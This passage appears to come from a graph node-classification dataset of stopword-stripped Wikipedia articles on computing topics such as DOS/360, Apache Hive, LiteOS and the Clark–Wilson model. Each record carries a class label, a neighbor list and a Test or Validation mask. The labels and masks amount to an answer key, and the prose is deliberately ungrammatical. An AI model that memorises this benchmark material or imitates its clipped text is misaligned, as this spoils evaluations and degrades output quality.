even 64-bit capable machines z/vse 4.1 released 2007 introduced support 64-bit real addressing 8 gb memory however parts supervisor run 64-bit mode provides 31-bit virtual address spaces problem state applications 2011 one estimate placed number sites using z/vse around 4000 developing new hardware generation unified system/360 s/360 computers ibm originally committed delivering single operating system os/360 also compatible low-end machines hardware already available os/360 project fell behind schedule described length fred brooks mythical man-month ibm forced quickly develop four additional systems os/360 finally released year late required least 64 kb memory dos designed use little memory could run 16 kb machines configuration available low-end s/360 model 30 unlike os/360 dos/360 initially single-job system support multitasking version multitasking supporting three memory partitions requiring 32 kb memory later released despite limitations dos/360 became widely used operating system processors less 256 kb memory system/360 hardware sold well dos/360 ran well system/360 processors medium-sized organizations could afford better operating systems customers dos/360 operating system filled time gap announcement system/360 availability intended operating system os/360 result delay number customers implemented dos systems committed significant investments run ibm expected dos/360 users would soon upgrade os/360 result investments reluctant commit conversion ibm needed continue offer dos/360 additional operating system hacker jargon file incorrectly states gecos also known gcos copied dos/360 case however xerox data systems xerox operating system xos intentionally similar dos simplify program porting dos/360 required system/360 cpu model 25 standard instruction set decimal floating-point instruction sets optional minimum memory requirement 16 kb storage protection required multiprogramming used 1052 model 7 printer-keyboard either selector multiplexor channel least one disk drive required — initially 2311 holding 7.25 mb card reader card punch line printer usually included magnetic tape drives could substituted typical configuration might consist s/360 model 30 32kb memory decimal instruction set ibm 2540 card reader/card punch ibm 1403 printer two three ibm 2311 disks two ibm 2415 magnetic tape drives 1052-7 console following description applies dos/360 except otherwise noted later versions offer additional functionality dos/360 designed run low-end models system/360 memory usage concern possible generate dos supervisor resident portion operating system small 5902 bytes detailed charts listed memory requirements sysgen option often little 100 bytes minimum system would leave 10 kb storage available single batch partition enough run utilities compilers except cobol pl/i full fortran iv keep memory usage small possible dos coded entirely assembly language reduce memory usage supervisor employed overlays called transients read one two reserved transient areas required two types transient routines called physical transients logical transients handled hardware exceptions provided program services open/close respectively transient module names began b sped loading storing names first directory often referred a-transients b-transients like system/360 operating software initial releases dos could run one program time later versions real dos able run three programs concurrently separate memory partitions supported hardware memory protection features scalable os/360 operating system identified bg background f1 foreground 1 f2 foreground 2 multiprogramming optional feature dos/360 selectable system generation dos-vs allowed seven concurrent programs although five six common number due smaller scale hardware usually hosting dos systems dos dos-vs allow number partitions set ipl initial program load ibm term boot load executable programs stored core image library running dos could reclaim space programs deleted replaced newer versions core image library became full compressed one utility programs could halt development work much half day many shops simply froze changes day compressed cil off-line ipled new core image library beginning business day relocatable library linkable object programs source statement library assembler macros include text also supported installations could define additional private relocatable source statement libraries disk volumes dos/360 set utility programs assembler compilers fortran cobol eventually pl/i supported range file organizations access methods help using sequential isam files could store either fixed-length variable-length records types could occupy one disk volume dos/360 also offered btam data communications facility primitive hard use later standards however btam could communicate almost type terminal big advantage time little standardization communications protocols simplicity api also allowed relatively easy interface external communications processors facilitated dos/360 machines becoming nodes multi-tier networks large organizations dos job control statements began card columns one two except end-of-job end-of-data comments description follows character represents single blank dos jcl designed parsing speed simplicity resulting positional syntax significantly cryptic os/360 keyword-driven job control early dos included spooling sub-system improve efficiency punched card line printer i/o late 1960s ibm aftermarket vendors began filling void ibm spooler option called power software design inc. independent software company sold spooler called grasp dos/360 relocating loader programmers link edit separate executable version program partition address space program likely run alternatively assembler-language programs could written self-relocating imposed additional complexity size penalty albeit small one large dos shops multiple machines multiple partition layouts often wrote relocating loader circumvent issue dos/360 application programming interface incompatible os/360 high level language programs written dos needed compiled linked could used os/360 minor differences compilers dos opposed os sometimes required modifications programs port direction however challenging since os/360 significantly features supported api use features would removed programs ported dos less problem programmers working high level languages cobol assembler programs hand tended utilize features often usually needed greater modification run dos",
    "neighbors": [
      6148,
      6664,
      6675,
      8213,
      10273,
      4645,
      7217,
      10803,
      7733,
      573,
      2625,
      9811,
      5220,
      9829,
      6248,
      9330,
      2168,
      2172,
      2179,
      10883,
      9351,
      9361,
      9370,
      7848,
      8879,
      10415,
      6325,
      1219,
      8388,
      6342,
      8393,
      8911,
      1235,
      3816,
      9977,
      3323,
      9468,
      2813,
      8966,
      10508,
      11539,
      789,
      5397,
      3359,
      2345,
      6442,
      1323,
      7983,
      7477,
      8502,
      10040,
      3916,
      7507,
      10072,
      11099,
      863,
      3938,
      868,
      3429,
      5492,
      375,
      3960,
      8063,
      7039,
      4996,
      7053,
      8077,
      9619,
      11673,
      6557,
      5022,
      1952,
      421,
      9139,
      5044,
      1464,
      5562,
      964,
      8136,
      5065,
      477,
      5598,
      5603,
      4586,
      8687
    ],
    "mask": "Test"
  },
  {
    "node_id": 1220,
    "label": 3,
    "text": "Beach_Head_(video_game):beach head video game beach-head video game developed published 1983 access software atari 8-bit family commodore 64 home computers us versions commodore 16 zx spectrum bbc micro acorn electron well atari c64 versions published europe u.s. gold 1984 followed version amstrad cpc platform 1985 game setting pacific ocean theater world war ii gameplay consists several varying stages player must control various vehicles including warships tanks order defeat enemy fleet break enemy beach defences destroy enormous gun-emplacement win game game included 1985 compilation sold million along daley thompson decathlon sabre wulf jet set willy sequel released 1985 loose remake game beach head 2000 released 2000 beach-head access best-selling commodore game late 1987 ahoy stated game blast praised graphics concluded remarkable programming achievement compute listed game may 1988 one favorite games stating superior many imitators zzap 64 reviewed game retrospective feature october 1985 argued although considered impressive time release already become dated rated 70 overall 1996 computer gaming world declared beach head 117th-best computer game ever released",
    "neighbors": [
      10931,
      9453,
      9006,
      1527
    ],
    "mask": "None"
  },
  {
    "node_id": 1221,
    "label": 2,
    "text": "LiteOS:liteos huawei liteos lightweight real-time operating system open source operating system licensed bsd 3-clause license iot smart terminals microcontrollers different architectures arm m0/3/4/7 a7/17/53 arm9/11 x86 risc-v supported project huawei liteos part huawei 1+2+1 internet things solution featured number open source development kits industry offerings huawei liteos features lightweight low-power fast-response multi-sensor collaboration multi-protocol interconnect connectivity enabling iot terminals quickly access network huawei liteos make intelligent hardware development easier thereby accelerating realization interconnection things latest version v2.1 released may 2018 may 20 2015 huawei network conference huawei proposed 1+2+1 internet things solution release iot operating system named huawei liteos",
    "neighbors": [
      10883,
      11267,
      7820,
      11405,
      8720,
      9366,
      7319,
      2201,
      9628,
      7341,
      8237,
      7983,
      10030,
      6207,
      321,
      10561,
      2117,
      8262,
      9927,
      6985,
      9162,
      2259,
      341,
      10590,
      6624,
      5603,
      5220,
      1253,
      1126,
      9320,
      10482,
      11383,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1222,
    "label": 7,
    "text": "Apache_Hive:apache hive apache hive data warehouse software project built top apache hadoop providing data query analysis hive gives sql-like interface query data stored various databases file systems integrate hadoop traditional sql queries must implemented mapreduce java api execute sql applications queries distributed data hive provides necessary sql abstraction integrate sql-like queries hiveql underlying java without need implement queries low-level java api since data warehousing applications work sql-based querying languages hive aids portability sql-based applications hadoop initially developed facebook apache hive used developed companies netflix financial industry regulatory authority finra amazon maintains software fork apache hive included amazon elastic mapreduce amazon web services apache hive supports analysis large datasets stored hadoop hdfs compatible file systems amazon s3 filesystem alluxio provides sql-like query language called hiveql schema read transparently converts queries mapreduce apache tez spark jobs three execution engines run hadoop resource negotiator yarn yet another resource negotiator accelerate queries provides indexes including bitmap indexes features hive include default hive stores metadata embedded apache derby database client/server databases like mysql optionally used first four file formats supported hive plain text sequence file optimized row columnar orc format rcfile apache parquet read via plugin versions later 0.10 natively starting 0.13 additional hive plugins support querying bitcoin blockchain major components hive architecture based sql hiveql strictly follow full sql-92 standard hiveql offers extensions sql including multitable inserts create table select offers basic support indexes hiveql lacked support transactions materialized views limited subquery support support insert update delete full acid functionality made available release 0.14 internally compiler translates hiveql statements directed acyclic graph mapreduce tez spark jobs submitted hadoop execution word count program counts number times word occurs input word count written hiveql brief explanation statements follows checks table codice_1 exists drops creates new table called codice_1 single column type codice_3 called codice_4 loads specified file directory case “ input_file ” table codice_5 specifies target table data loaded re-written otherwise data would appended query creates table called codice_6 two columns codice_7 codice_8 query draws input inner query query serves split input words different rows temporary table aliased codice_9 groups results based keys results codice_8 column holding number occurrences word codice_7 column sorts words alphabetically storage querying operations hive closely resemble traditional databases hive sql dialect lot differences structure working hive comparison relational databases differences mainly hive built top hadoop ecosystem comply restrictions hadoop mapreduce schema applied table traditional databases traditional databases table typically enforces schema data loaded table enables database make sure data entered follows representation table specified table definition design called schema write comparison hive verify data table schema write instead subsequently run time checks data read model called schema read two approaches advantages drawbacks checking data table schema load time adds extra overhead traditional databases take longer time load data quality checks performed data load time ensure data corrupt early detection corrupt data ensures early exception handling since tables forced match schema after/during data load better query time performance hive hand load data dynamically without schema check ensuring fast initial load drawback comparatively slower performance query time hive advantage schema available load time instead generated later dynamically transactions key operations traditional databases typical rdbms hive supports four properties transactions acid atomicity consistency isolation durability transactions hive introduced hive 0.13 limited partition level recent version hive 0.14 functions fully added support complete acid properties hive 0.14 later provides different row level transactions insert delete update enabling insert update delete transactions require setting appropriate values configuration properties codice_12 codice_13 codice_14 hive v0.7.0 added integration hadoop security hadoop began using kerberos authorization support provide security kerberos allows mutual authentication client server system client ’ request ticket passed along request previous versions hadoop several issues users able spoof username setting codice_15 property also mapreduce operations run user hadoop mapred hive v0.7.0 ’ integration hadoop security issues largely fixed tasktracker jobs run user launched username longer spoofed setting codice_15 property permissions newly created files hive dictated hdfs hadoop distributed file system authorization model uses three entities user group others three permissions read write execute default permissions newly created files set changing umask value hive configuration variable codice_17",
    "neighbors": [
      9344,
      10377,
      11017,
      8460,
      7567,
      1296,
      6161,
      1047,
      2456,
      8217,
      11161,
      6555,
      8860,
      6943,
      1952,
      3877,
      10661,
      11303,
      5677,
      9518,
      1327,
      7983,
      10413,
      7475,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      1087,
      7359,
      7233,
      6338,
      4419,
      9789,
      10048,
      4294,
      1991,
      7750,
      11201,
      5066,
      8139,
      11343,
      4944,
      7248,
      2130,
      1363,
      5332,
      6098,
      8408,
      9179,
      7261,
      734,
      990,
      8799,
      865,
      10719,
      11235,
      3045,
      8294,
      11111,
      8425,
      8810,
      747,
      5612,
      7147,
      7022,
      2163,
      8691,
      6774,
      7159,
      1913,
      1018
    ],
    "mask": "Test"
  },
  {
    "node_id": 1223,
    "label": 9,
    "text": "Edge_Side_Includes:edge side includes edge side includes esi small markup language edge level dynamic web content assembly purpose esi tackle problem web infrastructure scaling application edge computing fairly common websites generated content could changing content like catalogs forums personalization creates problem caching systems overcome problem group companies akamai art technology group bea systems circadence corporation digital island inc. interwoven inc. open market whose esi-related technology owned fatwire software oracle corporation vignette corporation developed esi specification submitted w3c approval proposal editor mark nottingham esi language specification 1.0 submitted world wide web consortium w3c approval august 2001 w3c acknowledged receipt accepted proposal esi implemented content delivery networks akamai caching proxy servers varnish squid mongrel esi although many implement complete specification akamai also adds additional features version support esi element tags inserted html text based content creation instead displayed viewers esi tags directives instruct esi processor take action xml based esi tags indicate edge-side processing agent action needs taken complete page assembly one simple example esi element include tag used include content external page esi include tag placed in-line within html document would look like case esi processor would retrieve src url failing alt url failed nothing esi system usually caching proxy server may local copy files insert without going back server alternatively whole page esi tags may cached esi requests may made origin server allows different caching times different parts page different degrees personalisation four main features esi main alternatives esi",
    "neighbors": [
      10368,
      225,
      7430,
      1802,
      8170,
      10506,
      3341,
      3450,
      9616,
      11154,
      4725,
      154,
      124,
      7965,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1224,
    "label": 7,
    "text": "Mendix:mendix mendix low-code software platform provides tools build test deploy iterate applications company founded 2005 1 august 2018 company ceo announced acquisition mendix siemens 730 million cash acquisition made official 1 october 2018 company founded rotterdam netherlands 2005 moved headquarters united states early 2012 october 2011 mendix raised 13 million first round venture capital funding funding led prime ventures additional participation henq invest provided unnamed sum 2006 january 2014 mendix closed 25 million series b led battery ventures company also reported triple-digit growth fifth consecutive year also 2014 mendix accelerated plans associated partner ecosystem company announced 20 new partners worldwide including bodhtree ust global pegamento pariveda solutions list complements company existing partner network including accenture capgemini among others subsequent partner additions included bizzomate mphasis blue box sogeti hp pivotal mendix also announced membership cloud foundry foundation company plans help evolve open source standard well integrate cloud foundry platform-as-a-service paas framework rapid app platform-as-a-service apaas mendix received number mentions recently forbes – listing mendix one top ten companies disrupting industries technology – always network – including mendix within top 100 onmobile private companies mendix application platform based visual model-driven software development request mendix qsm research made independent benchmark product compared average software projects qsm industry database according report mendix required smaller teams shorter projects reduced development effort respect average company offers free software community edition mendix application development tools company simultaneously announced new cloud ecosystem teams business analysts partners recently mendix announced enhancements mendix platform multi-channel app development mobile application development mendix app store also offers new widgets access native device functions contacts camera geolocation bar code scanner company also released mendix developer app test mobile apps developers scan qr code pair target devices development environments test native device functionality december 2014 mendix cited leader forrester wave enterprise public cloud platforms rapid developers q4 2014 report gartner also listed mendix visionary within 2015 magic quadrant enterprise application platforms service mendix announced reseller agreement sap sap resell mendix platform name sap cloud platform rapid application development mendix",
    "neighbors": [
      6018,
      1539,
      8451,
      5384,
      6027,
      4236,
      10893,
      526,
      911,
      272,
      1935,
      8592,
      405,
      2328,
      4377,
      8986,
      10265,
      5662,
      11038,
      5666,
      6307,
      9766,
      39,
      2217,
      6444,
      8495,
      3121,
      5681,
      9906,
      7352,
      10681,
      11070,
      448,
      2496,
      4289,
      8515,
      10820,
      3269,
      11201,
      4042,
      4683,
      4429,
      590,
      1102,
      7248,
      5202,
      467,
      9682,
      7512,
      10200,
      5210,
      6618,
      6367,
      4194,
      11646,
      3428,
      5732,
      6632,
      1001,
      10090,
      2795,
      5612,
      7660,
      8044,
      2170,
      253,
      8446,
      8191
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1225,
    "label": 4,
    "text": "Clark–Wilson_model:clark–wilson model clark–wilson integrity model provides foundation specifying analyzing integrity policy computing system model primarily concerned formalizing notion information integrity information integrity maintained preventing corruption data items system due either error malicious intent integrity policy describes data items system kept valid one state system next specifies capabilities various principals system model defines enforcement rules certification rules model described 1987 paper comparison commercial military computer security policies david d. clark david r. wilson paper develops model way formalize notion information integrity especially compared requirements multilevel security mls systems described orange book clark wilson argue existing integrity models biba read-up/write-down better suited enforcing data integrity rather information confidentiality biba models clearly useful example banking classification systems prevent untrusted modification information tainting information higher classification levels respectively contrast clark–wilson clearly applicable business industry processes integrity information content paramount level classification although authors stress three models obviously use government industry organizations according stewart chapple cissp study guide sixth edition clark-wilson model uses multi-faceted approach order enforce data integrity instead defining formal state machine model defines data item allows modifications small set programs model uses three-part relationship subject/program/object program interchangeable transaction known triple access control triple within relationship subjects direct access objects objects accessed programs look see differs access control models model ’ enforcement certification rules define data items processes provide basis integrity policy core model based notion transaction model contains number basic constructs represent data items processes operate data items key data type clark–wilson model constrained data item cdi integrity verification procedure ivp ensures cdis system valid certain state transactions enforce integrity policy represented transformation procedures tps tp takes input cdi unconstrained data item udi produces cdi tp must transition system one valid state another valid state udis represent system input provided user adversary tp must guarantee via certification transforms possible values udi “ safe ” cdi heart model notion relationship authenticated principal i.e. user set programs i.e. tps operate set data items e.g. udis cdis components relation taken together referred clark–wilson triple model must also ensure different entities responsible manipulating relationships principals transactions data items short example user capable certifying creating relation able execute programs specified relation model consists two sets rules certification rules c enforcement rules e nine rules ensure external internal integrity data items paraphrase since must make sure tps certified operate particular cdi must e1 e2 requires keeping track triples user tp cdis called allowed relations need authentication keep track information enters system need trusted constrained i.e udi must deal appropriately finally prevent people gaining access changing qualifications tp variant clark-wilson cw-lite model relaxes original requirement formal verification tp semantics semantic verification deferred separate model general formal proof tools",
    "neighbors": [
      3360,
      4067,
      11470,
      3700,
      10170
    ],
    "mask": "Test"
  },
  {
    "node_id": 1226,
    "label": 3,
    "text": "Molecule_Man_(video_game):molecule man video game molecule man isometric 3d arcade adventure game released mastertronic 1986 variety 8-bit home computers level editor included enables player design mazes molecule man trapped radioactive maze must reach escape teleport radiation kills player controls molecule man quest escape within time limit must find teleport repair using 16 circuit board pieces scattered around maze bombs must purchased blow open inaccessible areas meanwhile radiation killing health pills must purchased prolong life coins found lying around must collected taken dispensers purchase bombs pills",
    "neighbors": [
      10931,
      5820,
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1227,
    "label": 1,
    "text": "World_Checklist_of_Selected_Plant_Families:world checklist selected plant families world checklist selected plant families usually abbreviated wcsp international collaborative programme provides latest peer reviewed published opinions accepted scientific names synonyms selected plant families maintained royal botanic gardens kew available online allowing searches names families genera species well ability create checklists project traces history work done 1990s kew researcher rafaël govaerts checklist genus quercus influenced global strategy plant conservation project expanded 173 families seed plants included coverage monocotyledon families complete families added complementary project called international plant names index ipni kew also involved ipni aims provide details publication aim determine accepted species names delay year newly published names automatically added ipni wcsp wcsp also one underlying databases plant list created kew missouri botanical garden unveiled 2010",
    "neighbors": [
      560,
      10513,
      6580
    ],
    "mask": "Test"
  },
  {
    "node_id": 1228,
    "label": 3,
    "text": "Keystone_Kapers:keystone kapers keystone kapers video game published activision atari 2600 april 1983 later ported atari 5200 atari 8-bit family colecovision 1984 msx inspired mack sennett slapstick keystone cops series silent films object game officer keystone kelly player catch harry hooligan escape department store keystone kapers written activision designer garry kitchen game takes place side-view display three-story department store roof store eight times wider portion main display screen scrolls left right player reaches edges movement levels accomplished escalators located alternating ends map elevator center mini-map bottom screen provides overall view store location players player controls officer keystone kelly joystick used run right left along given floor reaches escalator taken next floor kelly also use elevator center map move requires careful timing moves kelly begins game lower right first floor normally begins running left reach escalator second floor harry hooligan starts game center second floor immediately begins running right attempt reach elevator third floor hooligan continues moving floors attempt reach roof via escalator left side third floor succeeds escapes trip takes 50 seconds timer top screen counts remaining time kelly runs significantly faster hooligan normally catch time straight run penalties kelly also use elevator get levels moves ahead hooligan hooligan reverse direction start back store aided ability jump levels either end map something kelly means kelly use elevators carefully risk stuck higher floor timer runs slowing kelly progress number still moving obstacles like radios beach balls shopping carts others jump duck pushing joystick touching objects causes nine-second penalty later levels flying toy biplanes cause player lose life upon contact game begins player given three lives one lost every round hooligan remains uncaught timer runs game proceeds rounds player runs lives extra lives awarded every 10,000 points maximum three kelly catches harry player score points based amount time left levels 1-9 player score left clock multiplied 100 points levels 10-15 amount left clock multiplied 200 points afterwards amount left clock multiplied 300 points kelly also pick suitcases bags money 50 points early video games end game level gets progressively harder adding and/or faster hazards kelly loses lives atari 2600 version keystone kapers received certificate merit category 1984 videogame year less 16k rom 5th annual arkie awards antic called atari 8-bit computer version perfect game anyone remarked superb animation deseret news gave colecovision version keystone kapers 3 stars praised game graphical improvement original",
    "neighbors": [
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1229,
    "label": 5,
    "text": "Xpress_Transport_Protocol:xpress transport protocol xpress transport protocol xtp transport layer protocol high-speed networks promoted xtp forum developed replace tcp xtp provides protocol options error control flow control rate control instead separate protocols type communication xtp controls packet exchange patterns produce different models e.g reliable datagrams transactions unreliable streams reliable multicast connections long latency one major problems satellite communications couple possible environmental variables sometimes asymmetrical bandwidth conditions quality service satellite communications sometimes lacking xtp addresses issues variety ways selective retransmission algorithm deals loss recovery works receiver detecting missing data packets transmitting list missing packets sender able quickly resend missing packets needed stated xtp also provides rate control maximum bandwidth specified well size burst data accepted xtp also offers reliable multicast protocol flexibility match specific application needs xtp employ congestion avoidance algorithms xtp real-time option layer 4 us navy safenet lan profile caini c. firrincieli r. marchese m. de cola t. luglio m. roseti c. et al 2006 transport layer protocols architectures satellite networks international journal satellite communications networking 25 1-26 retrieved march 9 2009 http //citeseerx.ist.psu.edu/viewdoc/download doi=10.1.1.73.7647 rep=rep1 type=pdf w. timothy strayer bert j. dempsey alfred c. weaver xtp xpress transfer protocol addison-wesley reading mass 1992",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      3695,
      8432,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 1230,
    "label": 4,
    "text": "MOBILedit:mobiledit mobiledit forensic digital forensics product compelson labs searches examines report data gsm/cdma/pcs cell phone devices mobiledit connects cell phone devices via infrared ir port bluetooth link wi-fi cable interface connectivity established phone model identified manufacturer model number serial number imei corresponding picture phone data acquired cell phone devices stored .med file format successful logical acquisition following fields populated data subscriber information device specifics phonebook sim phonebook missed calls last numbers dialed received calls inbox sent items drafts files folder items present files folder ranging graphics files camera photos tones depend phone ’ capabilities additional features include myphonesafe.com service provides access imei database register check stolen phones mobiledit platform works variety phones smartphones complete list supported handsets available manufacturer ’ website explores contents phone ms outlook-like folder structure allows backup information stored phone storing pc copy data another phone via phone copier feature",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 1231,
    "label": 6,
    "text": "Microsoft_basic_data_partition:microsoft basic data partition microsoft operating systems using basic disk partitioned guid partition table gpt layout basic data partition bdp partition identified globally unique identifier guid ebd0a0a2-b9e5-4433-87c0-68b6b72699c7 gpt scheme bdps partition types windows xp 64-bit mount normally assign drive letters according microsoft basic data partition equivalent master boot record mbr partition types 0x06 fat16b 0x07 ntfs exfat 0x0b fat32 practice equivalent 0x01 fat12 0x04 fat16 0x0c fat32 logical block addressing 0x0e fat16 logical block addressing types well basic data partition formatted filesystem although commonly bdps formatted ntfs exfat fat32 filesystems programatically determine filesystem bdp contains microsoft specifies one inspect bios parameter block contained bdp volume boot record microsoft operating system converts gpt-partitioned basic disk dynamic disk bdps combined converted single logical disk manager data partition identified guid af9b60a0-1431-4f62-bc68-3311714a69ad analogous conversion partition types 0x01 0x04 0x06 0x07 0x0b 0x0c 0x0e partition type 0x42 mbr partitioned disks linux used partition type guid basic data partition windows prior introduction linux specific data partition guid 0fc63daf-8483-4772-8e79-3d69d8477de4",
    "neighbors": [
      1801,
      7983,
      2193,
      2194,
      8793,
      3834,
      7070
    ],
    "mask": "Test"
  },
  {
    "node_id": 1232,
    "label": 4,
    "text": "OpenVAS:openvas openvas open vulnerability assessment system originally known gnessus software framework several services tools offering vulnerability scanning vulnerability management openvas products free software components licensed gnu general public license gpl plugins openvas written nessus attack scripting language nasl openvas began name gnessus fork previously open source nessus scanning tool developers tenable network security changed proprietary closed source license october 2005 openvas originally proposed pentesters securityspace discussed pentesters portcullis computer security announced tim brown slashdot openvas member project software public interest daily updated feed network vulnerability tests nvts 47,000 total june 2016 openvas protocol structure aims well-documented assist developers openvas compendium publication openvas project delivers documentation openvas",
    "neighbors": [
      5636,
      4755,
      4373,
      1429,
      6559,
      2084,
      7983,
      8497,
      2739,
      7989,
      7228,
      11202,
      8922,
      8539,
      4580,
      8295,
      5612,
      8304,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1233,
    "label": 7,
    "text": "Huddle_(software):huddle software huddle privately held cloud-based collaboration software company founded london 2006 alastair mitchell andy mcloughlin company co-headquartered london san francisco additional offices washington d.c. new york city company raised approximately 40 million three funding rounds jafco ventures eden ventures matrix partners angel investors august 2017 huddle acquired turn/river capital san francisco-based private equity firm huddle used department energy climate change charity barnardo ’ september 12 2013 huddle announced desktop integrations huddle mac huddle windows huddle outlook launch huddle note followed december 2013 enabling simple content creation cloud along redesigned ios app huddle office integration launched following year 2013 company received award “ emerging star year ” uk tech awards 2013 supplier year accolade computer weekly ’ european user awards enterprise software company ’ ceo alastair mitchell selected one computer weekly ’ “ ten rising stars ” publication ’ cw tech 50 awards 2014 huddle announced secured global enterprise-wide agreement grant thornton make secure cloud collaboration technology available member firms across globe addition williams lea global business process outsourcing bpo company signed enterprise-wide agreement huddle adding suite online tools increase speed collaborates internally externally huddle used 80 central uk government departments including ministry justice moj department environment food rural affairs defra department energy climate change department business innovation skills bis end august 2014 huddle secured 206 contracts via g-cloud framework september 12 2012 huddle announced fisma-certified instance cloud-based content collaboration platform developed u.s. government agencies organizations result strategic partnership technology development agreement in-q-tel non-profit strategic investment firm identifies innovative technology solutions support missions u.s. intelligence community instance cloud collaboration services enables u.s. government community securely discover access work content people technology currently developed two iqt customer agencies department homeland security science technology directorate national geospatial-intelligence agency",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 1234,
    "label": 9,
    "text": "Rlab:rlab rlab interactive interpreted numerical computation program core programming language written ian searle rlab language high level intended provide fast prototyping program development well easy data-visualization processing rlab designed clone matlab however rlab program intended provide good experimental environment laboratory matrix math programming language possesses similar operators concepts could called matlab-like rlab borrows best features matlab language provides different syntax modified order expressive reducing ambiguity variable scoping rules facilitate creation larger programs re-usable program libraries heterogeneous associative array datatype added allow users create operate arbitrary data structures fundamental data type dense floating point matrix either real complex though string sparse numerical matrices real complex also provided rlab 2.1 longer active development binary versions available linux windows source code available gpl rlab 2.2 released part project rlabplus marijan koštrun",
    "neighbors": [
      8262,
      6797,
      5395,
      823,
      7326
    ],
    "mask": "None"
  },
  {
    "node_id": 1235,
    "label": 2,
    "text": "UNIX_System_Services:unix system services unix system services uss required included component z/os uss certified unix operating system implementation xpg4 unix 95 optimized mainframe architecture first unix 95 derived source code integration rest z/os additional time sharing option tso commands available alongside usual unix services making possible process unix files using ispf extensions jcl make possible use files batch processing unix system services allows unix applications platforms run ibm system z mainframes running z/os many cases recompile necessary although additional effort may advisable z/os integration smp/e installation support uss supports ascii unicode technical requirement modify ascii unicode unix applications many z/os users often prefer ebcdic support applications including running uss consequently uss provides application administrator services converting to/from ebcdic programs running uss full secure access internal functions z/os database access db2 via call attach one example uss access services found elsewhere z/os naturally programs ported non-mainframe platforms without rewriting use z/os-specific services conversely program adheres unix standards posix ansi c easier move different unix operating systems including z/os unix file systems uss older hfs preferred zfs support unix-style long filenames appear special vsam datasets rest z/os numerous core z/os subsystems applications rely unix system services including z/os management facility xml parsing generation services openssh ibm http server z/os z/os sdk java z/os pki services examples uss also provides shell environment omvs uss predecessor operating system component called openedition mvs first implemented mvs/esa 4.3 enhanced mvs/esa 5.1 openedition mvs supported posix standards ibm continues enhance unix system services 2007 ibm announced z/os 1.9 includes several new uss features including partial alignment newer single unix specification version 3 unix 03 typically every release z/os includes enhancements uss",
    "neighbors": [
      3841,
      10883,
      4996,
      10631,
      6412,
      909,
      7053,
      8077,
      9361,
      9468,
      789,
      5397,
      8213,
      11673,
      9370,
      6557,
      7325,
      3359,
      421,
      7848,
      1323,
      5677,
      7983,
      8879,
      4913,
      7217,
      9138,
      10803,
      7477,
      7733,
      7607,
      10040,
      5562,
      573,
      1219,
      8388,
      6342,
      7507,
      863,
      868,
      3429,
      9829,
      6248,
      3443,
      5492,
      2168,
      3323,
      2172,
      2813,
      8063
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1236,
    "label": 9,
    "text": "Bjarne_Stroustrup:bjarne stroustrup bjarne stroustrup born 30 december 1950 danish computer scientist notable creation development c++ programming language visiting professor columbia university works morgan stanley managing director new york stroustrup master degree mathematics computer science 1975 aarhus university denmark phd computer science 1979 university cambridge england supervised david wheeler stroustrup began developing c++ 1979 called c classes words invented c++ wrote early definitions produced first implementation ... chose formulated design criteria c++ designed major facilities responsible processing extension proposals c++ standards committee stroustrup also wrote textbook language c++ programming language stroustrup head bell labs large-scale programming research department creation late 2002 stroustrup elected member national academy engineering 2004 elected fellow association computing machinery acm 1994 institute electrical electronics engineers ieee 2002 2014 stroustrup college engineering chair computer science professor texas university january 2014 stroustrup managing director technology division morgan stanley new york city visiting professor computer science columbia university stroustrup written co-written number publications including books tour c++ programming principles practice using c++ c++ programming language design evolution c++ annotated c++ reference manual stroustrup noble doctor itmo university since 2013 stroustrup senior dahl–nygaard prize 2015 year made fellow computer history museum invention c++ programming language 2017 institution engineering technology iet awarded faraday medal pioneering c++ one influential programming languages history computing january 3 2018 stroustrup announced 2018 winner charles stark draper prize engineering comes 500,000 named winner 2018 computer pioneer award ieee computer society awarded honorary doctor university carlos iii spain 25 january 2019",
    "neighbors": [
      4483,
      4998,
      10008,
      8987,
      1316,
      3876,
      44,
      9019,
      8382,
      3267,
      5699,
      10568,
      3529,
      1613,
      3577,
      11099,
      7273,
      8301,
      2798,
      6640,
      883,
      1783,
      8057,
      380,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1237,
    "label": 3,
    "text": "Upper_memory_area:upper memory area dos memory management upper memory area uma refers memory addresses 640 kb 1024 kb 0xa0000–0xfffff ibm pc compatible ibm reserved uppermost 384 kb 8088 cpu 1024 kb address space rom ram peripherals memory-mapped input/output example monochrome video memory area runs 704 736 kb 0xb0000–b7fff however even video ram rom bios i/o ports expansion cards much 384 kb address space unused 640 kb memory restriction became ever obstacle techniques found fill empty areas ram areas referred upper memory blocks umbs next stage evolution dos operating system use upper memory blocks umbs high memory area hma occurred release dr dos 5.0 1990 dr dos built-in memory manager emm386.exe could perform basic functionality qemm comparable programs advantage dr dos 5.0 combination older dos plus qemm dr dos kernel almost data structures could loaded high memory left virtually base memory free allowing configurations 620 kb 640 kb free configuration automatic free umbs identified hand manually included line loaded emm386 config.sys drivers manually loaded umbs config.sys autoexec.bat configuration trivial process largely automated installation program qemm program survived market indeed worked well dr dos hma umb support went one best-selling utilities pc functionality copied microsoft release ms-dos 5.0 june 1991 eventually even dos data structures moved conventional memory allowing 631 kb 640 kb left free starting version 6.0 ms-dos microsoft even included program called memmaker used automatically optimize conventional memory moving tsr programs upper memory period early 1990s manual optimization dos memory map became highly prized skill allowing largest applications run even complex pc configurations technique first create many umbs possible including remapping allocated unused blocks memory monochrome display area colour machines dos many subcomponents loaded umbs correct sequence use blocks memory efficiently possible tsr programs required additional memory loading freed loading complete fortunately dependencies amongst modules possible load almost sequence exceptions successfully cache cd-roms disk caches loaded cd-rom drivers modules network stacks loaded certain 